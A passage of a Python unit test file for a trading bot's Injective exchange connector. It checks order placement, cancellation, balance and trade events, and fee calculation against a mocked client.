self.data_source.add_listener(event_tag=OrderBookDataSourceEvent.SNAPSHOT_EVENT, listener=self.snapshots_logger)\n self.data_source.add_listener(event_tag=AccountEvent.BalanceEvent, listener=self.balance_logger)\n\n self.async_run_with_timeout(coro=self.data_source.start())\n\n @staticmethod\n def async_run_with_timeout(coro: Awaitable, timeout: float = 1):\n ret = asyncio.get_event_loop().run_until_complete(asyncio.wait_for(coro, timeout))\n return ret\n\n def tearDown(self) -> None:\n self.injective_async_client_mock.stop()\n self.async_run_with_timeout(coro=self.data_source.stop())\n super().tearDown()\n\n def test_place_order(self):\n expected_exchange_order_id = \"someEOID\"\n expected_transaction_hash = \"0x7e5f4552091a69125d5dfcb7b8c2659029395bdf\" # noqa: mock\n self.injective_async_client_mock.configure_place_order_response(\n timestamp=self.initial_timestamp,\n transaction_hash=expected_transaction_hash,\n exchange_order_id=expected_exchange_order_id,\n trade_type=TradeType.BUY,\n price=Decimal(\"10\"),\n size=Decimal(\"2\"),\n )\n order = GatewayInFlightOrder(\n client_order_id=\"someClientOrderID\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.BUY,\n creation_timestamp=self.initial_timestamp,\n price=Decimal(\"10\"),\n amount=Decimal(\"2\"),\n )\n exchange_order_id, misc_updates = self.async_run_with_timeout(coro=self.data_source.place_order(order=order))\n\n self.assertEqual(expected_exchange_order_id, exchange_order_id)\n self.assertEqual({\"creation_transaction_hash\": expected_transaction_hash}, misc_updates)\n\n def test_batch_order_create(self):\n expected_transaction_hash = \"0x7e5f4552091a69125d5dfcb7b8c2659029395bdf\" # noqa: mock\n buy_expected_exchange_order_id = (\n \"0x7df823e0adc0d4811e8d25d7380c1b45e43b16b0eea6f109cc1fb31d31aeddc8\" # noqa: mock\n )\n sell_expected_exchange_order_id = (\n \"0x8df823e0adc0d4811e8d25d7380c1b45e43b16b0eea6f109cc1fb31d31aeddc9\" # noqa: mock\n )\n buy_order_to_create = GatewayInFlightOrder(\n client_order_id=\"someCOIDCancelCreate\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.BUY,\n creation_timestamp=self.initial_timestamp,\n price=Decimal(\"10\"),\n amount=Decimal(\"2\"),\n exchange_order_id=buy_expected_exchange_order_id,\n )\n sell_order_to_create = GatewayInFlightOrder(\n client_order_id=\"someCOIDCancelCreate\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.SELL,\n creation_timestamp=self.initial_timestamp,\n price=Decimal(\"11\"),\n amount=Decimal(\"3\"),\n exchange_order_id=sell_expected_exchange_order_id,\n )\n orders_to_create = [buy_order_to_create, sell_order_to_create]\n self.injective_async_client_mock.configure_batch_order_create_response(\n timestamp=self.initial_timestamp,\n transaction_hash=expected_transaction_hash,\n created_orders=orders_to_create,\n )\n\n result: List[PlaceOrderResult] = self.async_run_with_timeout(\n coro=self.data_source.batch_order_create(orders_to_create=orders_to_create)\n )\n\n self.assertEqual(2, len(result))\n self.assertEqual(buy_expected_exchange_order_id, result[0].exchange_order_id)\n self.assertEqual({\"creation_transaction_hash\": expected_transaction_hash}, result[0].misc_updates)\n self.assertEqual(sell_expected_exchange_order_id, result[1].exchange_order_id)\n self.assertEqual({\"creation_transaction_hash\": expected_transaction_hash}, result[1].misc_updates)\n\n def test_cancel_order(self):\n creation_transaction_hash = 
\"0x8f6g4552091a69125d5dfcb7b8c2659029395ceg\" # noqa: mock\n expected_client_order_id = \"someCOID\"\n expected_transaction_hash = \"0x7e5f4552091a69125d5dfcb7b8c2659029395bdf\" # noqa: mock\n expected_exchange_order_id = \"0x6df823e0adc0d4811e8d25d7380c1b45e43b16b0eea6f109cc1fb31d31aeddc7\" # noqa: mock\n order = GatewayInFlightOrder(\n client_order_id=expected_client_order_id,\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.BUY,\n price=Decimal(\"10\"),\n amount=Decimal(\"1\"),\n creation_timestamp=self.initial_timestamp,\n exchange_order_id=expected_exchange_order_id,\n creation_transaction_hash=creation_transaction_hash,\n )\n order.order_fills[creation_transaction_hash] = None # to prevent requesting creation transaction\n self.injective_async_client_mock.configure_cancel_order_response(\n timestamp=self.initial_timestamp, transaction_hash=expected_transaction_hash\n )\n self.injective_async_client_mock.configure_get_historical_spot_orders_response_for_in_flight_order(\n timestamp=self.initial_timestamp,\n in_flight_order=order,\n order_hash=expected_exchange_order_id,\n is_canceled=True,\n )\n cancelation_success, misc_updates = self.async_run_with_timeout(coro=self.data_source.cancel_order(order=order))\n\n self.assertTrue(cancelation_success)\n self.assertEqual({\"cancelation_transaction_hash\": expected_transaction_hash}, misc_updates)\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n def test_batch_order_cancel(self):\n expected_transaction_hash = \"0x7e5f4552091a69125d5dfcb7b8c2659029395bdf\" # noqa: mock\n buy_expected_exchange_order_id = (\n \"0x6df823e0adc0d4811e8d25d7380c1b45e43b16b0eea6f109cc1fb31d31aeddc7\" # noqa: mock\n )\n sell_expected_exchange_order_id = (\n \"0x7df823e0adc0d4811e8d25d7380c1b45e43b16b0eea6f109cc1fb31d31aeddc8\" # noqa: mock\n )\n creation_transaction_hash_for_cancel = \"0x8f6g4552091a69125d5dfcb7b8c2659029395ceg\" # noqa: mock\n buy_order_to_cancel = GatewayInFlightOrder(\n client_order_id=\"someCOIDCancel\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.BUY,\n price=Decimal(\"10\"),\n amount=Decimal(\"1\"),\n creation_timestamp=self.initial_timestamp,\n exchange_order_id=buy_expected_exchange_order_id,\n creation_transaction_hash=creation_transaction_hash_for_cancel,\n )\n sell_order_to_cancel = GatewayInFlightOrder(\n client_order_id=\"someCOIDCancel\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.SELL,\n price=Decimal(\"11\"),\n amount=Decimal(\"2\"),\n creation_timestamp=self.initial_timestamp,\n exchange_order_id=sell_expected_exchange_order_id,\n creation_transaction_hash=creation_transaction_hash_for_cancel,\n )\n self.data_source.gateway_order_tracker.start_tracking_order(order=buy_order_to_cancel)\n self.data_source.gateway_order_tracker.start_tracking_order(order=sell_order_to_cancel)\n orders_to_cancel = [buy_order_to_cancel, sell_order_to_cancel]\n self.injective_async_client_mock.configure_batch_order_cancel_response(\n timestamp=self.initial_timestamp,\n transaction_hash=expected_transaction_hash,\n canceled_orders=orders_to_cancel,\n )\n\n result: List[CancelOrderResult] = self.async_run_with_timeout(\n coro=self.data_source.batch_order_cancel(orders_to_cancel=orders_to_cancel)\n )\n\n self.assertEqual(2, len(result))\n self.assertEqual(buy_order_to_cancel.client_order_id, result[0].client_order_id)\n self.assertIsNone(result[0].exception) # i.e. 
success\n self.assertEqual({\"cancelation_transaction_hash\": expected_transaction_hash}, result[0].misc_updates)\n self.assertEqual(sell_order_to_cancel.client_order_id, result[1].client_order_id)\n self.assertIsNone(result[1].exception) # i.e. success\n self.assertEqual({\"cancelation_transaction_hash\": expected_transaction_hash}, result[1].misc_updates)\n\n def test_get_trading_rules(self):\n trading_rules = self.async_run_with_timeout(coro=self.data_source.get_trading_rules())\n\n self.assertEqual(2, len(trading_rules))\n self.assertIn(self.trading_pair, trading_rules)\n self.assertIn(self.inj_trading_pair, trading_rules)\n\n trading_rule: TradingRule = trading_rules[self.trading_pair]\n\n self.assertEqual(self.trading_pair, trading_rule.trading_pair)\n self.assertEqual(Decimal(\"0.00001\"), trading_rule.min_price_increment)\n self.assertEqual(Decimal(\"0.00001\"), trading_rule.min_quote_amount_increment)\n self.assertEqual(Decimal(\"0.001\"), trading_rule.min_base_amount_increment)\n\n def test_get_symbol_map(self):\n symbol_map = self.async_run_with_timeout(coro=self.data_source.get_symbol_map())\n\n self.assertIsInstance(symbol_map, bidict)\n self.assertEqual(2, len(symbol_map))\n self.assertIn(self.injective_async_client_mock.market_id, symbol_map)\n self.assertIn(self.trading_pair, symbol_map.inverse)\n self.assertIn(self.inj_trading_pair, symbol_map.inverse)\n\n def test_get_last_traded_price(self):\n target_price = Decimal(\"1.157\")\n target_maker_fee = AddedToCostTradeFee(flat_fees=[TokenAmount(token=self.quote, amount=Decimal(\"0.0001157\"))])\n target_taker_fee = AddedToCostTradeFee(flat_fees=[TokenAmount(token=self.quote, amount=Decimal(\"0.00024\"))])\n self.injective_async_client_mock.configure_spot_trades_response_to_request_without_exchange_order_id(\n timestamp=self.initial_timestamp,\n price=target_price,\n size=Decimal(\"0.001\"),\n maker_fee=target_maker_fee,\n taker_fee=target_taker_fee,\n )\n price = self.async_run_with_timeout(coro=self.data_source.get_last_traded_price(trading_pair=self.trading_pair))\n\n self.assertEqual(target_price, price)\n\n def test_get_order_book_snapshot(self):\n self.injective_async_client_mock.configure_orderbook_snapshot(\n timestamp=self.initial_timestamp, bids=[(9, 1), (8, 2)], asks=[(11, 3)]\n )\n order_book_snapshot: OrderBookMessage = self.async_run_with_timeout(\n coro=self.data_source.get_order_book_snapshot(trading_pair=self.trading_pair)\n )\n\n self.assertEqual(self.initial_timestamp, order_book_snapshot.timestamp)\n self.assertEqual(2, len(order_book_snapshot.bids))\n self.assertEqual(9, order_book_snapshot.bids[0].price)\n self.assertEqual(1, order_book_snapshot.bids[0].amount)\n self.assertEqual(1, len(order_book_snapshot.asks))\n self.assertEqual(11, order_book_snapshot.asks[0].price)\n self.assertEqual(3, order_book_snapshot.asks[0].amount)\n\n def test_delivers_trade_events(self):\n target_price = Decimal(\"1.157\")\n target_size = Decimal(\"0.001\")\n target_maker_fee = DeductedFromReturnsTradeFee(flat_fees=[TokenAmount(token=self.quote, amount=Decimal(\"0.0001157\"))])\n target_taker_fee = AddedToCostTradeFee(flat_fees=[TokenAmount(token=self.quote, amount=Decimal(\"0.00024\"))])\n target_exchange_order_id = \"0x6df823e0adc0d4811e8d25d7380c1b45e43b16b0eea6f109cc1fb31d31aeddc7\" # noqa: mock\n target_trade_id = \"19889401_someTradeId\"\n self.injective_async_client_mock.configure_trade_stream_event(\n timestamp=self.initial_timestamp,\n price=target_price,\n size=target_size,\n maker_fee=target_maker_fee,\n 
taker_fee=target_taker_fee,\n exchange_order_id=target_exchange_order_id,\n taker_trade_id=target_trade_id,\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n self.assertEqual(2, len(self.trades_logger.event_log))\n self.assertEqual(2, len(self.trade_updates_logger.event_log))\n\n first_trade_event: OrderBookMessage = self.trades_logger.event_log[0]\n\n self.assertEqual(self.initial_timestamp, first_trade_event.timestamp)\n self.assertEqual(self.trading_pair, first_trade_event.content[\"trading_pair\"])\n self.assertEqual(TradeType.SELL, first_trade_event.content[\"trade_type\"])\n self.assertEqual(target_price, first_trade_event.content[\"price\"])\n self.assertEqual(target_size, first_trade_event.content[\"amount\"])\n self.assertFalse(first_trade_event.content[\"is_taker\"])\n\n second_trade_event: OrderBookMessage = self.trades_logger.event_log[1]\n\n self.assertEqual(self.initial_timestamp, second_trade_event.timestamp)\n self.assertEqual(self.trading_pair, second_trade_event.content[\"trading_pair\"])\n self.assertEqual(TradeType.BUY, second_trade_event.content[\"trade_type\"])\n self.assertEqual(target_price, second_trade_event.content[\"price\"])\n self.assertEqual(target_size, second_trade_event.content[\"amount\"])\n self.assertTrue(second_trade_event.content[\"is_taker\"])\n\n first_trade_update: TradeUpdate = self.trade_updates_logger.event_log[0]\n\n self.assertEqual(self.trading_pair, first_trade_update.trading_pair)\n self.assertEqual(self.initial_timestamp, first_trade_update.fill_timestamp)\n self.assertEqual(target_price, first_trade_update.fill_price)\n self.assertEqual(target_size, first_trade_update.fill_base_amount)\n self.assertEqual(target_price * target_size, first_trade_update.fill_quote_amount)\n self.assertEqual(target_maker_fee, first_trade_update.fee)\n\n second_order_event: TradeUpdate = self.trade_updates_logger.event_log[1]\n\n self.assertEqual(target_trade_id, second_order_event.trade_id)\n self.assertEqual(target_exchange_order_id, second_order_event.exchange_order_id)\n self.assertEqual(self.trading_pair, second_order_event.trading_pair)\n self.assertEqual(self.initial_timestamp, second_order_event.fill_timestamp)\n self.assertEqual(target_price, second_order_event.fill_price)\n self.assertEqual(target_size, second_order_event.fill_base_amount)\n self.assertEqual(target_price * target_size, second_order_event.fill_quote_amount)\n self.assertEqual(target_taker_fee, second_order_event.fee)\n\n def test_delivers_order_created_events(self):\n target_order_id = \"someOrderHash\"\n target_price = Decimal(\"100\")\n target_size = Decimal(\"2\")\n order = GatewayInFlightOrder(\n client_order_id=\"someOrderCID\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.BUY,\n creation_timestamp=self.initial_timestamp,\n exchange_order_id=target_order_id,\n )\n self.tracker.start_tracking_order(order=order)\n self.injective_async_client_mock.configure_order_stream_event(\n timestamp=self.initial_timestamp,\n order_hash=target_order_id,\n state=\"booked\",\n execution_type=\"limit\",\n order_type=\"buy_po\",\n price=target_price,\n size=target_size,\n filled_size=Decimal(\"0\"),\n direction=\"buy\",\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n self.assertEqual(1, len(self.order_updates_logger.event_log))\n\n order_event: OrderUpdate = self.order_updates_logger.event_log[0]\n\n self.assertIsInstance(order_event, OrderUpdate)\n self.assertEqual(self.initial_timestamp, 
order_event.update_timestamp)\n self.assertEqual(target_order_id, order_event.exchange_order_id)\n self.assertEqual(OrderState.OPEN, order_event.new_state)\n\n target_order_id = \"anotherOrderHash\"\n target_price = Decimal(\"50\")\n target_size = Decimal(\"1\")\n order = GatewayInFlightOrder(\n client_order_id=\"someOtherOrderCID\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.SELL,\n creation_timestamp=self.initial_timestamp,\n exchange_order_id=target_order_id,\n )\n self.tracker.start_tracking_order(order=order)\n self.injective_async_client_mock.configure_order_stream_event(\n timestamp=self.initial_timestamp,\n order_hash=target_order_id,\n state=\"booked\",\n execution_type=\"limit\",\n order_type=\"sell\",\n price=target_price,\n size=target_size,\n filled_size=Decimal(\"0\"),\n direction=\"sell\",\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n self.assertEqual(2, len(self.order_updates_logger.event_log))\n\n order_event: OrderUpdate = self.order_updates_logger.event_log[1]\n\n self.assertIsInstance(order_event, OrderUpdate)\n self.assertEqual(self.initial_timestamp, order_event.update_timestamp)\n self.assertEqual(target_order_id, order_event.exchange_order_id)\n self.assertEqual(OrderState.OPEN, order_event.new_state)\n\n def test_delivers_order_fully_filled_events(self):\n target_order_id = \"someOrderHash\"\n target_price = Decimal(\"100\")\n target_size = Decimal(\"2\")\n order = GatewayInFlightOrder(\n client_order_id=\"someOrderCID\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.BUY,\n creation_timestamp=self.initial_timestamp,\n exchange_order_id=target_order_id,\n )\n self.tracker.start_tracking_order(order=order)\n self.injective_async_client_mock.configure_order_stream_event(\n timestamp=self.initial_timestamp,\n order_hash=target_order_id,\n state=\"filled\",\n execution_type=\"limit\",\n order_type=\"buy\",\n price=target_price,\n size=target_size,\n filled_size=target_size,\n direction=\"buy\",\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n self.assertEqual(2, len(self.order_updates_logger.event_log))\n\n order_event: OrderUpdate = self.order_updates_logger.event_log[1]\n\n self.assertIsInstance(order_event, OrderUpdate)\n self.assertEqual(self.initial_timestamp, order_event.update_timestamp)\n self.assertEqual(target_order_id, order_event.exchange_order_id)\n self.assertEqual(OrderState.FILLED, order_event.new_state)\n\n self.injective_async_client_mock.configure_order_stream_event(\n timestamp=self.initial_timestamp,\n order_hash=target_order_id,\n state=\"filled\",\n execution_type=\"limit\",\n order_type=\"sell_po\",\n price=target_price,\n size=target_size,\n filled_size=target_size,\n direction=\"sell\",\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n self.assertEqual(4, len(self.order_updates_logger.event_log))\n\n order_event: OrderUpdate = self.order_updates_logger.event_log[3]\n\n self.assertIsInstance(order_event, OrderUpdate)\n self.assertEqual(self.initial_timestamp, order_event.update_timestamp)\n self.assertEqual(target_order_id, order_event.exchange_order_id)\n self.assertEqual(OrderState.FILLED, order_event.new_state)\n\n def test_delivers_order_canceled_events(self):\n target_order_id = \"0x6df823e0adc0d4811e8d25d7380c1b45e43b16b0eea6f109cc1fb31d31aeddc7\" # noqa: mock\n target_price = Decimal(\"100\")\n target_size = Decimal(\"2\")\n order = GatewayInFlightOrder(\n 
client_order_id=\"someOrderCID\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.BUY,\n creation_timestamp=self.initial_timestamp,\n exchange_order_id=target_order_id,\n )\n self.tracker.start_tracking_order(order=order)\n self.injective_async_client_mock.configure_order_stream_event(\n timestamp=self.initial_timestamp,\n order_hash=target_order_id,\n state=\"canceled\",\n execution_type=\"limit\",\n order_type=\"buy\",\n price=target_price,\n size=target_size,\n filled_size=Decimal(\"0\"),\n direction=\"buy\",\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n self.assertEqual(2, len(self.order_updates_logger.event_log))\n\n order_event: OrderUpdate = self.order_updates_logger.event_log[1]\n\n self.assertIsInstance(order_event, OrderUpdate)\n self.assertEqual(self.initial_timestamp, order_event.update_timestamp)\n self.assertEqual(target_order_id, order_event.exchange_order_id)\n self.assertEqual(OrderState.CANCELED, order_event.new_state)\n\n def test_delivers_order_book_snapshots(self):\n self.injective_async_client_mock.configure_orderbook_snapshot_stream_event(\n timestamp=self.initial_timestamp, bids=[(9, 1), (8, 2)], asks=[(11, 3)]\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n self.assertEqual(1, len(self.snapshots_logger.event_log))\n\n snapshot_event: OrderBookMessage = self.snapshots_logger.event_log[0]\n\n self.assertEqual(self.initial_timestamp, snapshot_event.timestamp)\n self.assertEqual(2, len(snapshot_event.bids))\n self.assertEqual(9, snapshot_event.bids[0].price)\n self.assertEqual(1, snapshot_event.bids[0].amount)\n self.assertEqual(1, len(snapshot_event.asks))\n self.assertEqual(11, snapshot_event.asks[0].price)\n self.assertEqual(3, snapshot_event.asks[0].amount)\n\n def test_get_account_balances(self):\n base_bank_balance = Decimal(\"75\")\n base_total_balance = Decimal(\"10\")\n base_available_balance = Decimal(\"9\")\n quote_total_balance = Decimal(\"200\")\n quote_available_balance = Decimal(\"150\")\n self.injective_async_client_mock.configure_get_account_balances_response(\n base_bank_balance=base_bank_balance,\n quote_bank_balance=Decimal(\"0\"),\n base_total_balance=base_total_balance,\n base_available_balance=base_available_balance,\n quote_total_balance=quote_total_balance,\n quote_available_balance=quote_available_balance,\n )\n\n subaccount_balances = self.async_run_with_timeout(coro=self.data_source.get_account_balances())\n\n self.assertEqual(base_total_balance, subaccount_balances[self.base][\"total_balance\"])\n self.assertEqual(base_available_balance, subaccount_balances[self.base][\"available_balance\"])\n self.assertEqual(quote_total_balance, subaccount_balances[self.quote][\"total_balance\"])\n self.assertEqual(quote_available_balance, subaccount_balances[self.quote][\"available_balance\"])\n\n def test_get_order_status_update_success(self):\n creation_transaction_hash = \"0x7cb2eafc389349f86da901cdcbfd9119425a2ea84d61c17b6ded778b6fd2g81d\" # noqa: mock\n target_order_hash = \"0x6ba1eafc389349f86da901cdcbfd9119425a2ea84d61c17b6ded778b6fd2f70c\" # noqa: mock\n in_flight_order = GatewayInFlightOrder(\n client_order_id=\"someClientOrderID\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.SELL,\n creation_timestamp=self.initial_timestamp,\n price=Decimal(\"10\"),\n amount=Decimal(\"1\"),\n creation_transaction_hash=creation_transaction_hash,\n exchange_order_id=target_order_hash,\n )\n 
self.injective_async_client_mock.configure_get_historical_spot_orders_response(\n timestamp=self.initial_timestamp + 1,\n order_hash=target_order_hash,\n state=\"booked\",\n execution_type=\"market\" if in_flight_order.order_type == OrderType.MARKET else \"limit\",\n order_type=(\n in_flight_order.trade_type.name.lower()\n + (\"_po\" if in_flight_order.order_type == OrderType.LIMIT_MAKER else \"\")\n ),\n price=in_flight_order.price,\n size=in_flight_order.amount,\n filled_size=Decimal(\"0\"),\n direction=in_flight_order.trade_type.name.lower(),\n )\n\n status_update: OrderUpdate = self.async_run_with_timeout(\n coro=self.data_source.get_order_status_update(in_flight_order=in_flight_order)\n )\n\n self.assertEqual(self.trading_pair, status_update.trading_pair)\n self.assertEqual(self.initial_timestamp + 1, status_update.update_timestamp)\n self.assertEqual(OrderState.OPEN, status_update.new_state)\n self.assertEqual(in_flight_order.client_order_id, status_update.client_order_id)\n self.assertEqual(target_order_hash, status_update.exchange_order_id)\n self.assertIn(\"creation_transaction_hash\", status_update.misc_updates)\n self.assertEqual(creation_transaction_hash, status_update.misc_updates[\"creation_transaction_hash\"])\n\n def test_get_all_order_fills_no_fills(self):\n target_order_id = \"0x6ba1eafc389349f86da901cdcbfd9119425a2ea84d61c17b6ded778b6fd2f70c\" # noqa: mock\n creation_transaction_hash = \"0x7cb2eafc389349f86da901cdcbfd9119425a2ea84d61c17b6ded778b6fd2g81d\" # noqa: mock\n self.injective_async_client_mock.configure_get_historical_spot_orders_response(\n timestamp=self.initial_timestamp,\n order_hash=target_order_id,\n state=\"booked\",\n execution_type=\"limit\",\n order_type=\"sell\",\n price=Decimal(\"10\"),\n size=Decimal(\"2\"),\n filled_size=Decimal(\"0\"),\n direction=\"sell\",\n )\n in_flight_order = GatewayInFlightOrder(\n client_order_id=\"someOrderId\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.SELL,\n creation_timestamp=self.initial_timestamp - 10,\n price=Decimal(\"10\"),\n amount=Decimal(\"2\"),\n exchange_order_id=target_order_id,\n )\n\n trade_updates = self.async_run_with_timeout(\n coro=self.data_source.get_all_order_fills(in_flight_order=in_flight_order)\n )\n\n self.assertEqual(0, len(trade_updates))\n\n def test_get_all_order_fills(self):\n target_client_order_id = \"someOrderId\"\n target_exchange_order_id = \"0x6ba1eafc389349f86da901cdcbfd9119425a2ea84d61c17b6ded778b6fd2f70c\" # noqa: mock\n target_trade_id = \"someTradeHash\"\n target_price = Decimal(\"10\")\n target_size = Decimal(\"2\")\n target_trade_fee = AddedToCostTradeFee(flat_fees=[TokenAmount(token=self.quote, amount=Decimal(\"0.01\"))])\n target_partial_fill_size = target_size / 2\n target_fill_ts = self.initial_timestamp + 10\n self.injective_async_client_mock.configure_get_historical_spot_orders_response(\n timestamp=self.initial_timestamp,\n order_hash=target_exchange_order_id,\n state=\"partial_filled\",\n execution_type=\"limit\",\n order_type=\"sell\",\n price=target_price,\n size=target_size,\n filled_size=target_partial_fill_size,\n direction=\"sell\",\n )\n self.injective_async_client_mock.configure_trades_response_with_exchange_order_id(\n timestamp=target_fill_ts,\n exchange_order_id=target_exchange_order_id,\n price=target_price,\n size=target_partial_fill_size,\n fee=target_trade_fee,\n trade_id=target_trade_id,\n )\n in_flight_order = GatewayInFlightOrder(\n client_order_id=target_client_order_id,\n trading_pair=self.trading_pair,\n 
order_type=OrderType.LIMIT,\n trade_type=TradeType.SELL,\n creation_timestamp=self.initial_timestamp - 10,\n price=target_price,\n amount=target_size,\n exchange_order_id=target_exchange_order_id,\n )\n\n trade_updates: List[TradeUpdate] = self.async_run_with_timeout(\n coro=self.data_source.get_all_order_fills(in_flight_order=in_flight_order)\n )\n\n self.assertEqual(1, len(trade_updates))\n\n trade_update = trade_updates[0]\n\n self.assertEqual(target_trade_id, trade_update.trade_id)\n self.assertEqual(target_client_order_id, trade_update.client_order_id)\n self.assertEqual(target_exchange_order_id, trade_update.exchange_order_id)\n self.assertEqual(self.trading_pair, trade_update.trading_pair)\n self.assertEqual(target_fill_ts, trade_update.fill_timestamp)\n self.assertEqual(target_price, trade_update.fill_price)\n self.assertEqual(target_partial_fill_size, trade_update.fill_base_amount)\n self.assertEqual(target_partial_fill_size * target_price, trade_update.fill_quote_amount)\n self.assertEqual(target_trade_fee, trade_update.fee)\n\n def test_check_network_status(self):\n self.injective_async_client_mock.configure_check_network_failure()\n\n status = self.async_run_with_timeout(coro=self.data_source.check_network_status())\n\n self.assertEqual(NetworkStatus.NOT_CONNECTED, status)\n\n self.injective_async_client_mock.configure_check_network_success()\n\n status = self.async_run_with_timeout(coro=self.data_source.check_network_status())\n\n self.assertEqual(NetworkStatus.CONNECTED, status)\n\n def test_get_trading_fees(self):\n all_trading_fees = self.async_run_with_timeout(coro=self.data_source.get_trading_fees())\n\n self.assertIn(self.trading_pair, all_trading_fees)\n\n pair_trading_fees: MakerTakerExchangeFeeRates = all_trading_fees[self.trading_pair]\n\n service_provider_rebate = Decimal(\"1\") - self.injective_async_client_mock.service_provider_fee\n expected_maker_fee = self.injective_async_client_mock.maker_fee_rate * service_provider_rebate\n expected_taker_fee = self.injective_async_client_mock.taker_fee_rate * service_provider_rebate\n self.assertEqual(expected_maker_fee, pair_trading_fees.maker)\n self.assertEqual(expected_taker_fee, pair_trading_fees.taker)\n\n def test_delivers_balance_events(self):\n target_total_balance = Decimal(\"20\")\n target_available_balance = Decimal(\"19\")\n self.injective_async_client_mock.configure_account_quote_balance_stream_event(\n timestamp=self.initial_timestamp,\n total_balance=target_total_balance,\n available_balance=target_available_balance,\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n self.assertEqual(1, len(self.balance_logger.event_log))\n\n balance_event: BalanceUpdateEvent = self.balance_logger.event_log[0]\n\n self.assertEqual(self.quote, balance_event.asset_name)\n self.assertEqual(target_total_balance, balance_event.total_balance)\n self.assertEqual(target_available_balance, balance_event.available_balance)\n\n def test_parses_transaction_event_for_order_creation_success(self):\n creation_transaction_hash = \"0x7cb1eafc389349f86da901cdcbfd9119435a2ea84d61c17b6ded778b6fd2f81d\" # noqa: mock\n target_order_hash = \"0x6ba1eafc389349f86da901cdcbfd9119425a2ea84d61c17b6ded778b6fd2f70c\" # noqa: mock\n in_flight_order = GatewayInFlightOrder(\n client_order_id=\"someClientOrderID\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.SELL,\n creation_timestamp=self.initial_timestamp,\n price=Decimal(\"10\"),\n amount=Decimal(\"1\"),\n 
creation_transaction_hash=creation_transaction_hash,\n exchange_order_id=target_order_hash,\n )\n self.tracker.start_tracking_order(order=in_flight_order)\n self.injective_async_client_mock.configure_creation_transaction_stream_event(\n timestamp=self.initial_timestamp + 1, transaction_hash=creation_transaction_hash\n )\n self.injective_async_client_mock.configure_get_historical_spot_orders_response(\n timestamp=self.initial_timestamp + 1,\n order_hash=target_order_hash,\n state=\"booked\",\n execution_type=\"market\" if in_flight_order.order_type == OrderType.MARKET else \"limit\",\n order_type=(\n in_flight_order.trade_type.name.lower()\n + (\"_po\" if in_flight_order.order_type == OrderType.LIMIT_MAKER else \"\")\n ),\n price=in_flight_order.price,\n size=in_flight_order.amount,\n filled_size=Decimal(\"0\"),\n direction=in_flight_order.trade_type.name.lower(),\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n status_update = self.order_updates_logger.event_log[0]\n\n self.assertEqual(self.trading_pair, status_update.trading_pair)\n self.assertEqual(self.initial_timestamp + 1, status_update.update_timestamp)\n self.assertEqual(OrderState.OPEN, status_update.new_state)\n self.assertEqual(in_flight_order.client_order_id, status_update.client_order_id)\n self.assertEqual(target_order_hash, status_update.exchange_order_id)\n\n @patch(\n \"hummingbot.connector.gateway.clob_spot.data_sources.injective.injective_api_data_source\"\n \".InjectiveAPIDataSource._update_account_address_and_create_order_hash_manager\",\n new_callable=AsyncMock,\n )\n def test_parses_transaction_event_for_order_creation_failure(self, _: AsyncMock):\n creation_transaction_hash = \"0x7cb1eafc389349f86da901cdcbfd9119435a2ea84d61c17b6ded778b6fd2f81d\" # noqa: mock\n target_order_hash = \"0x6ba1eafc389349f86da901cdcbfd9119425a2ea84d61c17b6ded778b6fd2f70c\" # noqa: mock\n in_flight_order = GatewayInFlightOrder(\n client_order_id=\"someClientOrderID\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.SELL,\n creation_timestamp=self.initial_timestamp,\n price=Decimal(\"10\"),\n amount=Decimal(\"1\"),\n creation_transaction_hash=creation_transaction_hash,\n exchange_order_id=target_order_hash,\n )\n self.tracker.start_tracking_order(order=in_flight_order)\n self.injective_async_client_mock.configure_order_status_update_response(\n timestamp=self.initial_timestamp,\n order=in_flight_order,\n creation_transaction_hash=creation_transaction_hash,\n is_failed=True,\n )\n\n self.injective_async_client_mock.run_until_all_items_delivered()\n\n status_update = self.order_updates_logger.event_log[1]\n\n self.assertEqual(self.trading_pair, status_update.trading_pair)\n self.assertEqual(self.initial_timestamp, status_update.update_timestamp)\n self.assertEqual(OrderState.FAILED, status_update.new_state)\n self.assertEqual(in_flight_order.client_order_id, status_update.client_order_id)\n self.assertEqual(0, len(self.trade_updates_logger.event_log))\n\n def test_parses_transaction_event_for_order_cancelation(self):\n cancelation_transaction_hash = \"0x7cb1eafc389349f86da901cdcbfd9119435a2ea84d61c17b6ded778b6fd2f81d\" # noqa: mock\n target_order_hash = \"0x6ba1eafc389349f86da901cdcbfd9119425a2ea84d61c17b6ded778b6fd2f70c\" # noqa: mock\n in_flight_order = GatewayInFlightOrder(\n client_order_id=\"someClientOrderID\",\n trading_pair=self.trading_pair,\n order_type=OrderType.LIMIT,\n trade_type=TradeType.SELL,\n creation_timestamp=self.initial_timestamp,\n price=Decimal(\"10\"),\n 
